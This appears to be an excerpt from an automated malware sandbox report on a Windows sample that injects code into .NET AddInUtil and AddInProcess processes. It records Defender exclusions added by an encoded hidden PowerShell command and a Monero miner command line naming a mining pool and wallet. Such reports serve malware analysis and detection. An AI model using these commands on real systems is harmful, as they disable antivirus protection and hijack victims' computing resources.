Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59733	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59621	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59274	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59701	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59592	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59471	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59353	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1199047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59651	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59417	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1198219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59855	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59746	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59626	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59501	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59376	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 1197297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59876	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59628	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59503	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread delayed: delay time: 59378	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477

Source: AddInProcess.exe, 00000008.00000002.4581896540.0000023F78A26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AddInProcess.exe, 00000008.00000002.4581896540.0000023F78A26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AddInUtil.exe, 00000005.00000002.4871128767.0000023C6CDFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: unknown

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\alfons\AppData\Roaming\ArgumentCount\Current.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\alfons\AppData\Local\Temp\ -Force; Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\alfons\AppData\Roaming\ArgumentCount\Current.exe

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread register set: target process: 6044			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Thread register set: target process: 5808			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabbahiazwb1ag0azqbuahqaqwbvahuabgb0afwaqwb1ahiacgblag4adaauaguaeablacwaqwa6afwavwbpag4azabvahcacwbcae0aaqbjahiabwbzag8azgb0ac4atgbfafqaxabgahiayqbtaguadwbvahiaawa2adqaxab2adqalgawac4amwawadmamqa5afwaqqbkagqasqbuafaacgbvagmazqbzahmalgblahgazqasaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxaagac0argbvahiaywbladsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaaqwa6afwavwbpag4azabvahcacwbcae0aaqbjahiabwbzag8azgb0ac4atgbfafqaxabgahiayqbtaguadwbvahiaawa2adqaxab2adqalgawac4amwawadmamqa5afwaqqbkagqasqbuafaacgbvagmazqbzahmalgblahgazqasaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabbahiazwb1ag0azqbuahqaqwbvahuabgb0afwaqwb1ahiacgblag4adaauaguaeablaa==

Source: C:\Users\user\Desktop\o9OIGsDt4m.exe	Queries volume information: C:\Users\user\Desktop\o9OIGsDt4m.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
